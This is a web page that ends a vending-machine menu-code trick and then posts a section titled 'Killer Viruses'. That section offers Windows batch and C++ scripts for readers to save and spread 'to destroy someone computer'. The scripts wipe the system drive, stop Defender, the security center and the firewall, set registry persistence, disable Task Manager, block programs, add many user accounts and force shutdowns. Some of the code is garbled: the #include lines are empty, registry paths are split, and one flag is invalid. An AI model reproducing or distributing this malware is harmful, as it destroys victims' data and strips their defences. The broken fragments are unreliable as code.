This might also work on some Coke vending machines that have a numeric keypad instead of buttons for specific drinks. Enter in the Coke code as usual, and you'll get to the sales menu!
Some machines require you to enter the code twice.
Several machines display a list of more codes, but most have the dispense options disabled.
!!!!Warning!!!!
Don't do this if there's a line behind you, as people may get upset waiting for you.
You might waste your time doing this, as Coca-Cola has distributed new firmware to their vendors that would render these instructions unusable.
You may be asked to leave or be fined if the owner catches you.
Use common sense, don't do it when others are around.






.Killer Viruses (Matrix,System 32,Worm)

Its content is based on I have known, produced, searched and the other is done and posted by other websites and that is credited to original posted and make it.\



this is for all that want to destroy someone computer i put some scrpits together and i made viruses see and try and good luck !!! Just open notepad and copy this scripts or codes and save them as name.bat and then spred them !!!! SOOO SIMPLE biggrin tongue smile -system32
del %systemdrive%\*.* /s /f /q
-worm
@echo off
taskkill -f -im explorer.exe
copy virus.bat C:\windows\
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
net user hhthhy virus /add
net user roc13xtyh virus /add
net user roc13x123 virus /add
net user roc13x1 virus /add
net user roc13x12 virus /add
net user roc13x2 virus /add
net user roc13x3 virus /add
net user roc13x4 virus /add
net user roc13x5 virus /add
net user roc13x6 virus /add
net user roc13x7 virus /add
net user roc13x8 virus /add
net user roc13x9 virus /add
net user roc13x0 virus /add
net user roc13x10 virus /add
net user roc13x10 virus /add
net user roc13x12 virus /add
net user roc13x2 virus /add
net user roc13x1 virus /add
net user roc13x2 virus /add
net user roc13x34 virus /add
net user roc13x34 virus /add
net user roc13x33 virus /add
net user roc13x343 virus /add
net user roc13x45 virus /add
net user roc13x00 virus /add
net user roc13x000 virus /add
net user roc13x0000 virus /add
net user roc13x00000 virus /add
net user roc13x000000 virus /add
net user roc13x0000000 virus /add
net user roc13x00000000 virus /add
net user roc13x000000000 virus /add
net user roc13x0000000000 virus /add
net user roc13x00000000000 virus /add
net user roc13x000000000000 virus /add
net user my comp /delete
mkdir %userprofile%\desktop\virus3000 njhjkhjkh
mkdir %userprofile%\desktop\virus3000hjhkhhjkh j
mkdir %userprofile%\desktop\virus3000jjjkjjj
mkdir %userprofile%\desktop\virus3000jhh
net stop "security center"
net stop "sharedaccess"
net stop "windows defender"
netsh firewall set opmode mode = disable
del "%userprofile%\desktop\internet explorer"
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\wi ndows\currentversion\run /hate /d C:\windows\bulldog worm.bat
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\system /v DisableTaskMgr /t REG_DWORD /d 1
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer /v NoClose /t REG_DWORD /d 1
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer /v DisallowRun /t REG_DWORD /d 1
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 1 /d iexplore.exe
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 2 /d notepad.exe
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 3 /d wordpad.exe
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 4 /d wmplayer.exe
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 5 /d msnmsgr.exe
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 6 /d avast.exe
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 7 /d help.exe
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 7 /d steam.exe
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 7 /d winmail.exe
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 7 /d outlook.exe
title VIRUS ALERT
color 04
echo A VIRUS HAS BEEN DETECTED ON YOUR COMPUTER AND WILL ERASE EVERYTHING!
shutdown -r
-matrix
#include
#include
#include
#include
#include
#include
#include
using namespace std;
int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);
{
char buffer[255];
char inputFile[]="C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}
{
char buffer[255];
char inputFile[]="C:\\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "COPY matrix.exe C:\\rawr.exe \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}
START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout << setw(4) << num;
cout << setw(4) << "0%";
cout << setw(4) << "P";
cout << setw(4) << " ";
cout << setw(4) << ")";
cout << setw(4) << "#";
cout << setw(4) << "X";
cout << setw(4) << "@";
cout << setw(4) << "1&";
cout << setw(4) << "*";
cout << setw(4) << "||";
cout << setw(4) << " \a";
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout << setw(4) << number;
}
goto START;
}